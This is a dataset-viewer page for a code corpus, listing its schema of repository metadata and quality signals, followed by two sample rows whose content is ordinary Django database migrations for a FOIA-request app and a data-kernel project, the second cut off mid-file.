Schema (one row per column):

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
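
The records below are much easier to handle programmatically than visually. As a minimal loading sketch, assuming a shard of this table is stored as Parquet (`shard.parquet` is a hypothetical placeholder path, not a file named on this page):

```python
import pandas as pd

# Hypothetical shard path; substitute a real file from the dataset.
df = pd.read_parquet("shard.parquet")

row = df.iloc[0]
# Repo metadata, the raw source file, and its quality signals sit side by side.
print(row["max_stars_repo_name"], row["lang"], row["size"])
print(row["content"][:120])
print(row["qsc_code_frac_chars_dupe_5grams_quality_signal"])
```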
**Row 1**

- hexsha: `156c3130c467226746745088ce065327bb3c73d9`; size: 22,800; ext: `py`; lang: Python
- max_stars: path `foiamachine/apps/agency/migrations/0001_initial.py`, repo `dwillis/foiamachine`, head `26d3b02870227696cdaab639c39d47b2a7a42ae5`, licenses ["Unlicense", "MIT"], count 9, events 2017-08-02T16:28:10.000Z to 2021-07-19T09:51:46.000Z
- max_issues: path, repo, head, and licenses as above; count null, event datetimes null
- max_forks: path, repo, head, and licenses as above; count 5, events 2017-10-10T23:15:02.000Z to 2021-07-19T09:51:48.000Z

content:

```python
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Agency'
db.create_table('agency_agency', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('deprecated', self.gf('django.db.models.fields.DateTimeField')(null=True)),
('yay_votes', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=0)),
('nay_votes', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=0)),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('slug', self.gf('django_extensions.db.fields.AutoSlugField')(allow_duplicates=False, max_length=50, separator=u'-', blank=True, populate_from=('name',), overwrite=False)),
('government', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['government.Government'])),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True)),
('hidden', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('agency', ['Agency'])
# Adding M2M table for field contacts on 'Agency'
db.create_table('agency_agency_contacts', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('agency', models.ForeignKey(orm['agency.agency'], null=False)),
('contact', models.ForeignKey(orm['contacts.contact'], null=False))
))
db.create_unique('agency_agency_contacts', ['agency_id', 'contact_id'])
def backwards(self, orm):
# Deleting model 'Agency'
db.delete_table('agency_agency')
# Removing M2M table for field contacts on 'Agency'
db.delete_table('agency_agency_contacts')
models = {
'agency.agency': {
'Meta': {'object_name': 'Agency'},
'contacts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'agency_related_contacts'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['contacts.Contact']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'government': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['government.Government']"}),
'hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "('name',)", 'overwrite': 'False'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contacts.address': {
'Meta': {'object_name': 'Address'},
'content': ('django.db.models.fields.TextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'contacts.contact': {
'Meta': {'object_name': 'Contact'},
'addresses': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['contacts.Address']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'dob': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'emails': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['core.EmailAddress']", 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'middle_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'notes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['contacts.Note']", 'null': 'True', 'blank': 'True'}),
'phone_numbers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['contacts.Phone']", 'null': 'True', 'blank': 'True'}),
'titles': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['contacts.Title']", 'null': 'True', 'blank': 'True'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'contacts.note': {
'Meta': {'object_name': 'Note'},
'content': ('django.db.models.fields.TextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'contacts.phone': {
'Meta': {'object_name': 'Phone'},
'content': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'contacts.title': {
'Meta': {'object_name': 'Title'},
'content': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.emailaddress': {
'Meta': {'object_name': 'EmailAddress'},
'content': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '75'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.adminname': {
'Meta': {'object_name': 'AdminName'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'name_plural': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.feeexemptionother': {
'Meta': {'object_name': 'FeeExemptionOther'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "('name',)", 'overwrite': 'False'}),
'source': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'typee': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.government': {
'Meta': {'object_name': 'Government'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'holidays': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['government.Holiday']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'nation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['government.Nation']", 'null': 'True', 'blank': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "('name',)", 'overwrite': 'False'}),
'statutes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_statutes'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['government.Statute']"}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.holiday': {
'Meta': {'object_name': 'Holiday'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.language': {
'Meta': {'object_name': 'Language'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "('name',)", 'overwrite': 'False'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.nation': {
'Meta': {'object_name': 'Nation'},
'admin_0_name': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'admin_0_nations'", 'null': 'True', 'to': "orm['government.AdminName']"}),
'admin_1_name': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'admin_1_nations'", 'null': 'True', 'to': "orm['government.AdminName']"}),
'admin_2_name': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'admin_2_nations'", 'null': 'True', 'to': "orm['government.AdminName']"}),
'admin_3_name': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'admin_3_nations'", 'null': 'True', 'to': "orm['government.AdminName']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'foi_languages': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['government.Language']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'primary_language': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'primary_language_nations'", 'null': 'True', 'to': "orm['government.Language']"}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "('name',)", 'overwrite': 'False'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.statute': {
'Meta': {'object_name': 'Statute'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'days_till_due': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'designator': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'fees_exemptions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['government.FeeExemptionOther']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'short_title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "('short_title',)", 'overwrite': 'False'}),
'text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'updates': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['government.Update']", 'null': 'True', 'blank': 'True'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.update': {
'Meta': {'object_name': 'Update'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'headline': ('django.db.models.fields.CharField', [], {'default': "'The latest'", 'max_length': '1024'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'pubbed': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'text': ('django.db.models.fields.TextField', [], {}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
}
}
complete_apps = ['agency']
```

Row 1 stats: avg_line_length 83.211679, max_line_length 218, alphanum_fraction 0.572895, effective 0, hits 8.

| quality signal | `*_quality_signal` value | bare column |
|---|---|---|
| qsc_code_num_words | 2,255 | 0 |
| qsc_code_num_chars | 22,800 | 0 |
| qsc_code_mean_word_length | 5.675388 | 0 |
| qsc_code_frac_words_unique | 0.08071 | null |
| qsc_code_frac_chars_top_2grams | 0.105642 | 0 |
| qsc_code_frac_chars_top_3grams | 0.183779 | 1 |
| qsc_code_frac_chars_top_4grams | 0.262541 | 1 |
| qsc_code_frac_chars_dupe_5grams | 0.829583 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.810986 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.788248 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.765276 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.717456 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.666198 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.008109 | 0 |
| qsc_code_frac_chars_whitespace | 0.183289 | 0 |
| qsc_code_size_file_byte | 22,800 | 0 |
| qsc_code_num_lines | 274 | 0 |
| qsc_code_num_chars_line_max | 219 | 0 |
| qsc_code_num_chars_line_mean | 83.211679 | 0 |
| qsc_code_frac_chars_alphabet | 0.679179 | 0 |
| qsc_code_frac_chars_comments | 0.007237 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.3861 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.588467 | 0 |
| qsc_code_frac_chars_long_word_length | 0.343217 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.007722 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0.003861 | 0 |
| qsc_codepython_frac_lines_import | 0.015444 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.034749 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |
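
Several of the size-based signals can be checked directly against this row: 22,800 characters over 274 lines gives 83.2117, matching both avg_line_length and qsc_code_num_chars_line_mean_quality_signal. A sketch of the simplest signals, reading the column names at face value (the pipeline's exact definitions are not given on this page, so treat these as approximations):

```python
def simple_signals(content: str) -> dict:
    """Approximate the size- and character-class-based quality signals."""
    lines = content.splitlines()
    n_chars = len(content)
    return {
        "qsc_code_size_file_byte": len(content.encode("utf-8")),
        "qsc_code_num_lines": len(lines),
        "qsc_code_num_chars_line_max": max(len(line) for line in lines),
        "qsc_code_num_chars_line_mean": n_chars / len(lines),
        "alphanum_fraction": sum(c.isalnum() for c in content) / n_chars,
        "qsc_code_frac_chars_whitespace": sum(c.isspace() for c in content) / n_chars,
        "qsc_code_frac_chars_digital": sum(c.isdigit() for c in content) / n_chars,
    }
```

The off-by-one between max_line_length (218) and qsc_code_num_chars_line_max_quality_signal (219) in this row suggests that one of the two counts the line terminator.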
**Row 2**

- hexsha: `15700d909b888b4e41e74d11021240eaf7370c47`; size: 3,127; ext: `py`; lang: Python
- max_stars: path `aether-kernel/aether/kernel/api/migrations/0006_auto_20180122_1346.py`, repo `lordmallam/aether`, head `7ceb71d2ef8b09d704d94dfcb243dbbdf8356135`, licenses ["Apache-2.0"], count 14, events 2018-08-09T20:57:16.000Z to 2020-10-11T12:22:18.000Z
- max_issues: path, repo, head, and licenses as above; count 148, events 2018-07-24T10:52:29.000Z to 2022-02-10T09:06:44.000Z
- max_forks: path, repo, head, and licenses as above; count 6, events 2018-07-25T13:33:10.000Z to 2019-09-23T03:02:09.000Z

content:

```python
# Generated by Django 2.0.1 on 2018-01-22 13:46
from django.db import migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('kernel', '0005_auto_20180116_1246'),
]
operations = [
migrations.AddField(
model_name='attachment',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='attachment',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
migrations.AddField(
model_name='mapping',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='mapping',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
migrations.AddField(
model_name='project',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='project',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
migrations.AddField(
model_name='projectschema',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
